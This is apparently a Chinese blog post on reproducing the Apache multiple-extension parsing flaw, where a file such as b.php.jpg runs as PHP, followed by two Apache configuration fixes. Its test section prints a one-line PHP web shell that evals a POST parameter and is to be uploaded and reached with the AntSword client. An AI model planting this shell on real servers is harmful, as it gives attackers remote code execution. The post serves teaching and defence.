服务器容器漏洞-apache apache_parsing_vulnerability

Apache两个解析漏洞复现及防御方法 - FreeBuf网络安全行业门户

1、介绍

名称:apache apache_parsing_vulnerability

编号:

原理:apache默认从右往左匹配后缀名,比如b.php.jpg,会作为b.php执行

应用:apache

版本:

2、测试

2.1 靶场搭建

2.2 测试过程

(1)上传b.php.jpg

<?php
eval(@$_POST['axx']);
?>

(2)中国蚁剑连接

3、漏洞防护

(1)拒绝所有文件名含有.php的文件

<FilesMatch "\.php\.">
require all denied
</FilesMatch>

(2)处理程序只处理以.php结尾的文件

首先将上一个防御方案的配置命令注释掉

再注释掉原本的处理出现配置命令AddHandler application/x-httpd-php .php

<FilesMatch ".+.php$">
SetHandler application/x-httpd-php
</FilesMatch>

 

posted @   挖洞404  阅读(49)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· 微软正式发布.NET 10 Preview 1:开启下一代开发框架新篇章
· 没有源码,如何修改代码逻辑?
· PowerShell开发游戏 · 打蜜蜂
· 在鹅厂做java开发是什么体验
· WPF到Web的无缝过渡:英雄联盟客户端的OpenSilver迁移实战
点击右上角即可分享
微信分享提示